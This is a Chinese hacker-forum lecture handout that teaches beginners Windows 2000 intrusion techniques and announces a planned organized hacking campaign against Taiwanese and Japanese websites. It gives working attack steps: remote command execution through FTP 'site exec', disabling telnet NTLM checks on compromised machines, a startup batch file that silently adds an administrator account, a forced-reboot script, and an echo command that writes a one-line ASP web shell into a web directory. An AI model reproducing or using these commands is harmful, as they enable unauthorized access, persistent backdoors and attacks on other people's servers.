经典收藏:黑暗天堂的第一论讲义,各大黑客站点都有相关技术文章
课前强调的几个问题:
一,严格遵守以下纪律:
具体规则(试行):
1.任何时间不许谈政治,网络纠纷,色情及不文明用语。
2.讲课期间只准私聊,不可以发言。每讲一节,会有时间留给你们反馈本节不懂内容。
3.认真听讲,对重复问题不与回答。
4.不可以嘲笑佳宾,管理员,及其他一些基础较差的朋友。
5.不允许VIP私自将讲义转发给非会员,一经发现将取消VIP资格。
6.课堂中公布的有漏洞网站,未经允许,不允许添加,删除,更改网站中任何内容。
二,关于找软件 推荐_blank>http://www.chinesehack.org
三,最好的老师就是搜索,http://www.google.com _blank>http://www.baidu.com
四,对于本站的vip,可以在论坛的vip专区获得讲义,其他朋友可以打开记事本做一下笔记,只要复制你需要的就可以了。课后,菜鸟应该总结和自我整理一下笔记,最好能将心得写下来,发表在论坛上,如果录用将获得vip身份。
五,我们网站初建,百废待兴。欢迎大家踊跃加入我们,一起营造一个好的学习气氛,共同进步。但是,请不要用学到的一点皮毛到处黑网站,更不要借918x的名义做任何事。
六,希望大家努力成为vip,我们即将成立918技术联盟,计划明年9月15日---9月18日,对台湾,日本等网站有组织的展开行动。
第一章 win2000我们必须知道的几点
一 什么是shell?
人机交互的界面。
shell是有权限差别的。最高权限--管理员权限才是我们的目标。所以有时会有提升权限的问题。
有了shell还要扩大它,就是进一步获得更好用的shell。命令行的到图形的、功能少的到多的。于是才有了“怎么开3389”,“怎么上传”之类问题。
二 cmd.exe ftp.exe telnet.exe 3大系统文件
1 cmd.exe 2000下:c:\winnt\system32\cmd.exe xp下:c:\windows\system32\
cmd.exe的功能及其强大,远远超过了98的command.com,而且cmd.exe还能够实现99%的在图形界面下的功能。所以一旦取得cmd.exe的控制权就能够掌握整个系统。Cmd一般代指shell,可以执行其内部的命令和外部命令,从而获得控制权。命令都有自己的参数来不同的需要。
cmd.exe 是有漏洞的:“cmd.exe超长路径名缓冲溢出/DoS缺陷”
2 ftp.exe,默认端口:21。我们一直在讲的serv-u是一个ftp服务段的软件,而客户段就是我们机子上的ftp.exe,他的命令参数很多。“FTP命令全集”。
他主要的作用是用来上传下载的。由于命令复杂,使用不方便,所以我们现在用软件来代替他,如cuteftp ,flashfxp。
这里我主要说明一下ftp的一个大家知道很少的命令:
当你获得ftp服务器的管理员密码后,是可以远程执行命令的,如:
C:\>ftp 111.111.111.111 21
User (111.111.111.111:(none)): 918x
331 User name okay, need password.
Password:*******
ftp>quote site exec net user xr rain /add ‘我们添加了一个用户
[技巧]ftp>quote site exec 你要执行的命令
3 telnet.exe 默认端口:23。Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端。
简单来说,我们远程登陆了telnet就获得了一个shell。对于unix来说,他也有telnet,但是它用明文来传送密码。所以它的安全的替代程序是OpenSSH。
开启telnet服务,我们这样:net start telnet(关闭为 net stop telnet)
在对win2000的telnet来说,我们牵涉到一个东西,NTLM验证。简单来说,就是一个限制远程登陆的机制,默认是需要NTLM验证的,所以我们需要关闭他。
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\TELNETSERVER\1.0下的NTLM键值默认是2。(NTML认证方式 0:开启telnet时去掉NTLM验证 1:先进行验证,验证失败就用用户名和密码登陆 2:开启NTML验证)
我们可以上传并运行小容的ntml.exe来使严正失效。
在没有办法上传的情况下,我这里提供一个很通用的办法,其他的办法大家可以自己在网上找到的:
⑴ 得到肉鸡的用户名和密码以后(也可以自己创建一个),在自己的机器上建立一个一样的用户和密码
⑵ 在WINNT\system32中找到cmd.exe,创建桌面快捷图标,在快捷中点右键-属性-选“以其他身份运行”-然后以你建立的用户名和密码运行。
然后,我们就可以远程连接:在cmd下 telnet ip 端口(23)了。
三,了解vbs ,vbe ,bat
1 vbs,vbe. VBS文件是用VB Script编写而成,该脚本语言功能非常强大,它们利用Windows系统的开放性特点,通过调用一些现成的Windows对象、组件,可以直接对文件系统、注册表等进行控制,功能非常强大。所以一些病毒的代码是vbs的。
他和VB,ASP等同出一则,也就是说会一种其他的自然就能编写了。
提供一个vbs的教程地址:大家有兴趣去看:_blank>http://www.zjol.com.cn/vbbible/software/program/VBSdocs/VBSTUTOR.HTM
2 bat 就是我们所说的批处理。简单的说就是可以一次运行多个命令的命令集合。
他在整个hack过程中是个非常好的攻击思路的。比如在asp提升权限的研究里,默认系统下C:\Documents and Settings\All Users\下是可写的,我们可以添加如下bat文件在主机重启后,可获得一个管理用户:C:\Documents and Settings\All Users\「开始」菜单\程序\启动\1.bat
1.bat 的内容是:
net user xr rain /add ‘(这就添加了一个用户名为xr,密码为rain的用户)
net localgroup administrators xr /add ‘(把xr添加为管理员)
再提供一个重启的bat文件,可以在Windows所有系统下适用。
@echo off
echo welcome to _blank>http://www.918x.com
setlocal
cd/d %temp%
echo [version] > reboot.inf
set inf=InstallHinfSection DefaultInstall
echo signature=$chicago$ >> reboot.inf
echo [defaultinstall] >> reboot.inf
rundll32 setupapi,%inf% 1 %temp%\reboot.inf
del reboot.inf
四,几个重要的cmd下的命令
1. Echo 写文本的命令 大家打开你们的cmd,如下:
C:\>echo 11111111>1.txt
C:\>echo 222222>>1.txt (注意:这里是>>,如果用的是>,那么前面的11111内容将被覆盖。)
再看看C盘是不是多了一个1.txt,好了,大家经常看教程,我就不多说了。能被echo的文件类型很多,但都应该是文本类型,如:txt,htm,asp,php,vbs,bat,inf
要注意的是:当你要echo的内容中包括<>这两个字符时,记得前面要加上字符^。如:
Echo ^<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT^>eval(Request.form(rain)+)^</SCRIPT^>>d:\web\1.asp
明眼一看就知道,这是冰狐浪子的asp木马。
2. Set 和ver ,我不多说了,刺探系统的命令。大家可以在自己的电脑上运行一下。
3. Netstat –an来检测当时的网络连接数目,也可以查看本机开放端口的情况。
五,FTA32和NTFS
我们知道98是16位的系统,他只支持FAT和FAT32的,所以装了双系统的朋友有时候在98下会找不到2000的系统盘。这是因为98下认不出NTFS。这里我不多说了,希望了解的朋友可以自己查找一下。我只说两点,现在的linux是支持NTFS的但不支持FAT。NTFS分区的磁盘才可能作到权限的分配,也就是说如果系统盘是FAT分区的,则普通用户可以任意修改删除系统文件,而在NTFS分区上是不能的。
具体在hack中的应用,大家参见我写的文章:《利用FAT32对虚拟主机渗透的曲折过程》
_id=3&cat_id=3" target=_blank>http://www.918x.com/showart.asp?art_id=3&cat_id=3
